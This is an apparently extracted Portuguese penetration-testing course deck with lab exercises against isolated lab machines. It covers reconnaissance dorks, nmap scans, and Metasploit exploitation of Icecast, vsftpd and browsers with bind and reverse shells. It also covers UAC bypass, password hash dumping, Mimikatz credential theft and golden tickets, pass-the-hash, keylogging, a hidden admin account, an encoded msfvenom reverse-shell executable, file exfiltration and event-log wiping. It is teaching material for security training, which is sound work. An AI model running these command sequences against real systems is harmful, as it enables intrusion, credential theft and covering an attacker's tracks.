Escolar Documentos
Profissional Documentos
Cultura Documentos
Ataques em redes
Certifications
CISM,CRISC,CGEIT,GPEN,GCIH, e algumas outras.
Experience
18 anos em Segurança da Informação
Contact
ricardo@tavares.io
Dicas importantes
NÃO COPIE E COLE OS COMANDOS DO SLIDE PARA O SEU SHELL. DIGITE CADA COMANDO INDIVIDUALMENTE.
• Se está executando os comandos solicitados com as devidas permissões. Em alguns exercícios serão solicitados que execute comandos
com permissões administrativas. O nmap e msfconsole deverão ser sempre executados com permissões administrativas;
• Se tiver problemas com a execução de comandos dentro do Metasploit, finalize todos os jobs ativos utilizando o comando jobs –K e
todas as sessões ativas utilizando o comando sessions –K;
• Se algum comando falhar, utilize a tecla TAB para auto completar um comando que esteja digitando, e confirmar se realmente o
comando está sendo digitado corretamente;
• Se todas as recomendações falharam, reinicie o sua máquina virtual alvo e o seu KALI. Se mesmo assim os problemas continuarem,
restaure o snapshoot do sistema operacional para um snapshoot correspondente aos requisitos do exercício.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Objetivo
Modelar as ações das ameaças do mundo
real para encontrar vulnerabilidades de uma forma
controlada e explorar estas vulnerabilidades
determinando o risco ao negócio com o
objetivo de recomendar defesas apropriadas
que possam ser integradas na operação da organização
alvo.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Definições
Vulnerabilidade - Falha
Ameaça - Agente ou
que pode ser explorada
ator que pode causar
para causar algum
um dano.
dano.
Exploit - Código ou
Risco - Onde a ameaça técnica que uma
e vulnerabilidade se ameaça usa para tirar
sobrepõe. vantagem da
vulnerabilidade.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Definições
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Por que fazer um teste de instrusão
Stolen
Physical Cryptanalysis
equipament
security test attack
test
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Metodologias
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Fases de um ataque
Preparação Recon
Pós Exploração
Configuração do C2
D
Configuração
Scanning Exploração Consciência Exfiltration Clean up Deception
de
Situacional Persistência
A
C Escalação de
B
Privilégio
Movimentação
Lateral
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Fases de um ataque
Reconhecimento
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Objetivo
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
O que devo buscar
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Onde devo buscar
Metadados Avaliação
DNS
de arquivos física
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
WHOIS
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
ARIN LOOKUP
Consultar
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Site Search
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Site Search (Google Dorks)
site:www.meusite.com certificados
site:.com.br certificados
link:www.meusite.com
related:www.meusite.com
intitle:index.of passwd
inurl:viewtopic.php
filetype:.pdf ou ext:.pdf (sinônimos) , tentar buscar sem o filetype também.
robots.txt disallow filetype:txt (importante se colocar o site: também)
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Análise de Metadados
É possível obter nome do usuário, caminhos do sistema de arquivos, e-mail, software utilizado e outras
informações importantes. Posso coletar estes documentos revendo os documentos enviados pelo alvo
durante a fase de planejamento do teste, através de e-mails enviados, por downloads do website.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Consulta no DNS host -v -t any site.com 10.1.1.12
host -v -t any -l site.com 10.1.1.12
DNS records (NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV. -l = zone transfer
-r = desativa recursividade
Querys padrões de DNS vão pela porta UDP 53, enquanto os zone
transfers vão pela porta TCP 53. dig @[server] [name] [type]
zone transfer = -t AXFR
Recursive lookup - Se o DNS não possui a informação que ele solicita, incremental zone transfer = -t IXFR=N
ele faz o foward da requisição para outro servidor DNS com o objetivo (providenciar registros modificados desde
de obter a informação. que o serial number do SOA for N)
+ norecursive
Por padrão o nslookup usa a recursividade. (RD bit = 1 - Recursion + recursive
desired).
nslookup
server [ip]
DNS cache Snooping - Técnica de investigar o que existe no cache de set type=any
um servidor DNS. ls -d [dominioalvo]
ls -d [dominioalvo] [> filename]
view [filename]
set norecursive (bom para determinar o que
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
existe no cache do dns)
Maltego
- Conceito de Transforms - Pega um pedaço do dado e converte em outro através de um lookup.
www.paterva.com/maltego
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 1 – Coleta de Informações
1 – Abra o shell do KALI (terminal) e instale o whois.
apt-get install whois
Obter os endereços de servidores de DNS, contatos de e-mail de responsáveis e informações que entenderem que são úteis.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 1 – Coleta de Informações
1 – Selecione um site qualquer e realize download de arquivos para uma posterior análise de metadados.
wget -nd -r -R html,html,php,asp,aspx,cgi -P /home/tools/metadados www.site.com
2 – Realize a análise dos metadados dos arquivos obtidos e insira as informações identificadas na tabela a seguir.
Nome do usuário Conta do usuário Aplicação usada Versão de software E-mail Diretório Outros
Xls
Doc
PDF
exiftool nomedoarquivo
strings nomedoarquivo
strings -e l nomedoarquivo |grep '\\'
strings -e b nomedoarquivo |grep '\\'
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Fases de um ataque
Scanning
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Scanning
Objetivo: Aprender mais sobre o alvo, e encontrar aberturas para interagir com o ambiente.
Determinar endereço de rede, topologia, sistema operacional, portas abertas, serviços e
vulnerabilidades.
Vulnerability
Version Scanning
scanning
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Scanning
TCP Control Bits
- Conhecidos como Control Flags ou Communication Flags são: SYN,ACK,RST,FIN,URG,PSH, CWR,ECE - cada bit
pode ter o valor de 0 ou 1.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Scanning - Nmap
Tipos de scan
-sT Connected Scan (3way handshake, mas envia reset se a conexão foi feita no final) - executada com ou sem root e
menos controle do nmap porque usa a chamada do OS connect().
-sS - SYN SCAN (half-open) - requer privilégio root se recebe o syn-ack envia reset para o host.
-sA - ACK - útil para identificar hosts, mas não diz se a porta está aberta ou fechada. Usar em um established filter no
roteador.
-sF - FIN
-sN - Null
-sX - XMAS tree Scan - FIN, PSH e URG.
-sM - Maimon - FIN e ACK porque algumas pilhas tcp derivadas do bsd irão responder a sondagem com RESET se a
porta está fechada, e nada se estiver aberta.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Scanning
Three-Way Hand-shake
Syn (Seq=ISNA ACK=0) -> Syn-ACK (Seq=ISNB ACK=ISNA+1) -> ACK (Seq=ISNA+1 ACK=ISNB+1) - Na
essência existem dois streams de sequência de números na série de pacotes, uma de A para B e outra de B para A.
Lembrar que: (tecnicas half-open scanning)
- quando a porta esta aberta recebo o SYN-ACK;
- quando a porta está fechada recebo um RST-ACK;
- bloqueada por firewall recebo ICMP Port Unreachble;
- se não receber nada de volta a porta pode estar bloqueada por firewall.
Não existem Control Bits no UDP.
Lembrar que:
- udp in e upd back - porta aberta;
- udp in e icmp port unreachble back - porta fechada (ou bloqueada pelo firewall) -> Se receber o port unreachble
(ICMP type 3, code 3) a porta esta fechada e se receber outros erros type 3 com o codigo 1,2,9,10 ou 13 a porta está
filtrada.
- Udp in sem volta - a porta pode esta fechada, o firewall pode esta bloqueando a entrada ou saída, a porta esta aberta
mas esperando um dado especifico no payload (nmap tente enviar um payload a partir da versao 5.20).
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 2 - Nmap
1 – Abra o shell de sua distribuição Linux (terminal).
2 – Execute o NMAP para verificar quais portas estão abertas em sua estação de trabalho Windows.
nmap <IP Windows>
3 - Ative o Icecast, desative o firewall do Windows e execute o NMAP novamente, mas desta vez obtendo mais informações
através do parâmetro verbose.
nmap –v <IP Windows>
4 - Execute o NMAP para verificar se as portas 22,23, 53, 80, 135 e 443 TCP estão abertas em seu
servidor Linux (máquina virtual Metasploitable).
nmap -v -sT <IP METASPLOITABLE> -p 22,23,53,80,135,443
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 2 - Nmap
5 - Execute o NMAP para verificar EXATAMENTE quais serviços estão ativos nas portas abertas do exercício anterior.
nmap -v -sT -sV <IP METASPLOITABLE> -p 22,23,53,80,135,443 (inserir somente as portas que estão abertas).
6 – Execute o NMAP para verificar quais são as portas abertas, serviços correspontes e o sistema operacional da sua estão de trabalho Windows.
nmap –v –sT –sV –O <IP Windows>
7 – Execute o NMAP para verificar quais portas UDP estão abertas na sua estão de trabalho Windows e em seu Servidor Linux.
nmap –v –sU <IP Windows>
nmap –v –sU < IP METASPLOITABLE >
8 - Evite ser identificado, execute o NMAP usando um HALF SCAN (SYN) (-sS) em seu ambiente Windows e Linux, evitando
a resolução de nomes (-n) e usar o ping para verificar se o host está ativo (Pn).
nmap –v –n –Pn –sS –sV –O <ip Windows>
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Entrando no território inimigo
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploit
O que é um exploit?
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Metasploit Exploitation Framework
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Metasploit Exploitation Framework
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Metasploit Exploitation Framework
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Metasploit Exploitation Framework
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Metasploit Exploitation Framework
Comandos básicos do
meterpreter
?/help
mkdir/rmdir
exit/quit - sai do meterpreter removendo da memória do
edit
alvo
getpid
sysinfo
getuid
shutdown/reboot
ps
reg
kill
cd
execute (executa um programa com os privilégios do
lcd
processo no qual o meterpreter está rodando)
pwd/getwd
migrate (injeta a dll no processo alvo e remove do
ls
anterior) - fornece acesso a tudo o que o processo
cat
oferece.
download/upload
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Consciência Situacional
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Estabelecer persistência
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Escalar Privilégio
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Obter privilégios administrativos
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Identificar o que é importante
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Identificar o que causa impacto
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Service Side
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 3 (shell bind)
Verifique se o NMAP informa a existência de alguma porta aberta com o serviço do ICECAST. Caso o ICECAST não seja exibido, desative o firewall do
computador alvo executando o comando netSh advfirewall set allprofiles state off no prompt.
2 – Acessar o msfconsole.
$ msfconsole
O msfconsole deverá ser executado com as permissões administrativas.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 3 (shell bind)
5 – Selecionar o payload.
msf exploit(icecast_header) > set payload windows/shell/bind_tcp
7 – Configurar o endereço ip do alvo, a porta de serviço utilizada pelo Icecast que está aberta, e qual porta que será aberta para acessar o shell
(aleatória) no alvo.
msf exploit(icecast_header) > set RHOST 192.168.16.20
msf exploit(icecast_header) > set RPORT 8000
msf exploit(icecast_header) > set LPORT 7777
8 – Inicie a exploração
msf exploit(icecast_header) > exploit
O que aconteceu?
10 - Digite exit no shell, pressione CTRL +C e em sequência a tecla y para confirmar a finalização da sessão e voltar ao msfconsole.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 4 (shell reverse)
1 – Encerre e abra o programa do Icecast no computador alvo, mantendo o seu serviço ativo.
3 – Selecionar o payload.
msf exploit(icecast_header) > set payload windows/shell/reverse_tcp
4 – Quais foram as novas opções que apareceram em comparação com o exercício anterior?
5 – Configurar o endereço ip do alvo, a porta de serviço do Icecast que está aberta, o seu endereço IP, e em qual porta de seu
computador o shell reverso deverá retornar (aleatória).
msf exploit(icecast_header) > set LHOST 192.168.16.10
msf exploit(icecast_header) > set RHOST 192.168.16.20
msf exploit(icecast_header) > set RPORT 8000
msf exploit(icecast_header) > set LPORT 7777
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 4 (shell reverse)
7 – No computador alvo confirme a conexão reversa executando o comando a seguir no prompt (shell) do Windows.
netstat -naob | findstr ESTABLISHED (Identificar qual conexão direciona para o IP do seu host Debian / KALI)
8 - Digite exit no shell, pressione CTRL +C e em sequência a tecla y para confirmar a finalização da sessão e voltar ao msfconsole.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 5 (Linux)
4 – Escolher o payload
msf> set payload cmd/unix/interact
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 5 (Linux)
5 – Configurar o endereço ip do alvo, a porta de serviço do VSFTP que está aberta.
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.16.30
msf exploit(vsftpd_234_backdoor) > set RPORT 21
6 – Realizar a exploração.
msf> exploit
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exploração
Client Side
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 6 (browser_autopwn)
Tenha certeza que instalou todos os softwares requisitados antes de iniciar o exercício.
4 – Execute o exploit.
msf auxiliary(browser_autopwn) > exploit
(Aguarde a mensagem ”Server Started”, pode demorar alguns segundos)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercício 6 (browser_autopwn)
Depois de exibir ”Command shell session opened” algumas vezes pressione ENTER.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 7 (browser e meterpreter)
1 – Solicite informações sobre o exploit adobe_flash_hacking_team_uaf.
info exploit/multi/browser/adobe_flash_hacking_team_uaf
Qual o objetivo deste exploit?
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 7 (browser e meterpreter)
6 – Inicie o exploit.
exploit -j -z
-j – Inicia o exploit no contexto de job.
-z – Não interage com a sessão.
Se o exploit falhar na execução, execute o comando jobs –K para remover todos os jobs ativos que foram criados em
exercicíos anteriores.
7 – Através do Windows, abra o Internet Explorer e acesse o endereço http://192.168.16.10/relatorio. Será iniciado o
processo de exploração.
8 – Liste as sessões.
Pressione a tecla ENTER após ser exibido ”Meterpreter session X opened” e execute os comandos a seguir:
sessions –l
(sessions –l = letra “L” de list)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 7 (browser e meterpreter)
9 – Interagir com a primeira sesão aberta.
sessions –i 1 (ou utilize o número da sessão correspondente e listada após o comando sessions –l)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 7 (browser e meterpreter)
13 – Abra o shell da máquina alvo comprometida.
execute -f cmd.exe -c -i
No shell do Windows que será aberto, execute os comandos a seguir e informe o resultado após a execução de cada comando:
• hostname
• ipconfig
• dir
• exit
No shell do Windows que será aberto, execute os comandos a seguir e informe o resultado após a execução de cada comando:
• Hostname
• ipconfig
• dir
• exit
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Pós exploração
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Escalação de Privilégio
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 8 (escalação de privilégio)
Desbloquear a conta de administrador local do seu Windows e configurar a palavra cyber como a senha para a conta.
1 – Reinicie o serviço do ICECAST, confirme se o mesmo está inicializado e funcionando, e realize a exporação usando o
payload windows/meterpreter/reverse_https.
O que aconteceu? Se você não obteve o privilégio administrativo, provavelmente você foi barrrado pelo UAC (User Account
Control) do Windows.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 8 (escalação de privilégio)
4 – Realizando o bypass no User Account Control.
a – Saia do meterpreter e volte para o shell do msfconsole.
background
c – Configurar a sessão do exploit com o número da sessão atual que está usando no meterpreter.
sessions –l (lista as sessões caso não saiba o número da sessão)
set session 1 (insira o número da sessão que está usando)
d – Selecionar o tipo de alvo sendo 0 para sistemas operacionais de 32 bit e 1 para sistemas operacionais de 64 bit.
set target 1
f – Iniciar a exploração
exploit -j -z (se tiver falhas na exploração utilize o exploit exploit/windows/local/bypassuac. Se as falhas continuarem siga as DICAS informadas
na configuração do laboratório)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 8 (escalação de privilégio)
5 – Pressionar ENTER e verificar as sessões abertas. Interagir com a nova sessão criada pelo exploit bypassuac.
sessions –l (letra L)
sessions –i 1 (numero da nova sessão)
O que aconteceu?
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exfiltration
Senhas
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 9 (Obtendo o hash)
1 – Continuando o exercício anterior, após obter o privilégio de SYSTEM, obtenha o hash da senha dos usuários do sistema operacional
executando os comandos a seguir.
hashdump
run post/windows/gather/smart_hashdump
O que aconteceu?
Se você não conseguiu obter o hash você não está com o privilégio adequado.
2 – Para obter o privilégio adequado migre o seu processo para o lsass.exe (Local Security Authority Subsystem Service).
getpid (procurar o processo lsass.exe)
migrate <PID do processo lsass.exe)
E execute novamente os comandos indicados no passo 1.
Abra o editor de texto(gedit), anote os hashes e salve o arquivo como senhas.txt no caminho /tmp.
Será algo parecido como: Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::
O hash será utilizado no próximo exercício.
Qual a diferença entre estes três comandos executados para obter o hash?
3 – No Windows, abra o gerenciador de tarefas, encontre o processo do ICECAST e o finalize. O que aconteceu com a sua conexão da
invasão? Por quê?
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MIMIKATZ
Sources
https://github.com/gentilkiwi/mimikatz
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MIMIKATZ – Comandos Úteis
log
privilege::debug
Sekurlsa
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
Kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670
/krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MIMIKATZ – Comandos Úteis
Crypto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export crypto::keys /machine /export
Valt
vault::cred
vault::list token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MIMIKATZ – Windows 8.1 e 10
Extraindo senhas em texto puro de usuários Windows 8.1 e Windows 10 de um provedor WDigest.
Quando a Microsoft lançou o Windows 8.1 ela adicionou algumas características de segurança que removeram a
habilidade de ferramentas como o mimikatz e WCE para realizar o dump de credencias em texto puro da
memória LSA.
Estas funcionalidades estão disponíveis para versões do Windows anteriores ao Windows 8.1 através da correção
de segurança https://support.microsoft.com/en-us/kb/2871997.
Como o WDigest é usado por muitos produtos (como o IIS) a Microsoft deixou o Wdigest provider ativo. O
Windows 8.1 traz uma configuração de chave de registro que permite desativar o armazenamento de credenciais
em texto puro do Wdigest provider.
(HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential)
como o valor padrão de 0, mesmo não aparecendo no Windows 8.1. Isto significar que não irá suportar
credenciais de logon armazenadas em texto puro na memória LSA.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
MIMIKATZ – Windows 8.1 e 10
Pelo meterpreter
reg createkey -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t
REG_DWORD -d 1
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
WCE – Windows Credential Editor
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
WCE – Windows Credential Editor
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
LaZagne
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
LaZagne
Ajuda
laZagne.exe all –w
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Movimentação Lateral
Passh the Hash
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 11 (Pass the hash)
1 - Procurar pelo exploit psexec.
search psexec
5 – Realizar a configuração para que o payload realize a conexão reversa em seu computador, na porta TCC 443.
6 – Configurar o usuário e hash para a exploração. (é essencial que tenha realizado o Passo ZERO do exercício 5 e o passo 3 do exercício 6).
set smbuser <usuario>
set smbpass <hash>
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 11 (Pass the hash)
7 – Executar a exploração.
exploit -j –z
9 – Obter privilégio de sistema. (Talvez seja necessário executar o bypassuac, consulte o passo 4 do exercício 5).
10 – Obter o hash.
Para que tenha acesso a recursos do alvo, como tela, teclado, webcam e outros dispositivos com os quais o usuário interage, é necessário que seja
realizada a migração para o processo explorer.exe.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 11 (Pass the hash)
14 – Ative o Keylogger.
c - Desative o keylogger.
keyscan_stop
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 12 (usando módulos)
1 – Continuando a partir da exploração do exercício anterior, criar o usuário hacker com privilégios administrativos, mas antes obtenha privilégio de
SISTEMA.
use incognito (carrega o módulo Incognito)
add_user hacker minhasenha (digite uma senha de sua escolha no lugar de minhasenha)
add_localgroup_user Administradores hacker
c- Acessar o computador alvo através do RDESKTOP com o usuário hacker e senha configurada.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 13 (backdoor com msfvenom)
1 – Crie o seu malware com o encode shikata_ga_nai.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.16.10 LPORT=443 -e x86/shikata_ga_nai -i 20 -f exe > /tmp/malware.exe
3 – Abra o metasploit em outra janela do terminal escutando na porta 443 de uma conexão reversa do meterpreter.
msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.16.10
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set exitonsession false
msf exploit(handler) > exploit -j -z
Antes de executar o MALWARE você deve ter alguém preparado para receber a conexão. Está é a função do multi/handler, que neste caso ficará
escutando e esperando para receber a conexão reversa do meterpreter.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 13 (backdoor com msfvenom)
4 – No Windows você deverá abrir o browser acessando o IP de seu computador (LINUX – DEBIAN) e fazer download do malware para
o seu desktop.
http://192.168.16.10/malware.exe
5 – Executar o malware.
6 – No C:\ do Windows criar uma pasta chamada Confidencial e dentro desta pasta criar um arquivo texto com o nome de secreto.txt,
escrevendo o texto SECRETO dentro do arquivo.
9 – Obter o hash.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 13 (backdoor com msfvenom)
Se não conseguiu talvez o nome do seu arquivo esteja errado. Verifique o nome do arquivo e tente realizar o download com
o comando.
download c://confidencial//secreto.txt.txt
12 – Limpar os logs do Event Viewer do Windows para dificultar a tentativas de identificação de seu ataque.
clearev
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 14 (shell para meterpreter)
0 – Confirme se o Firewall do Windows está desativado.
5 – Sai do shell com o comando exit e execute novamente o arquivo malware2.exe no Windows.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 14 (shell para meterpreter)
6 – Abra o msfconsole e execute o multi/handler usando o mesmo payload da arquivo malware3.exe.
msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/shell_bind_tcp
msf exploit(handler) > set RHOST 192.168.16.20
msf exploit(handler) > set LPORT 6666
msf exploit(handler) > set exitonsession false
msf exploit(handler) > exploit -j –z
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 14 (shell para meterpreter)
11 – Obter o hash.
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
Exercicio 15 (persistência)
Copyright – Professor Ricardo Tavares – ricardo@tavares.io. Uso autorizado somente para alunos da TURMA 5 de Cyber Security da DMBS
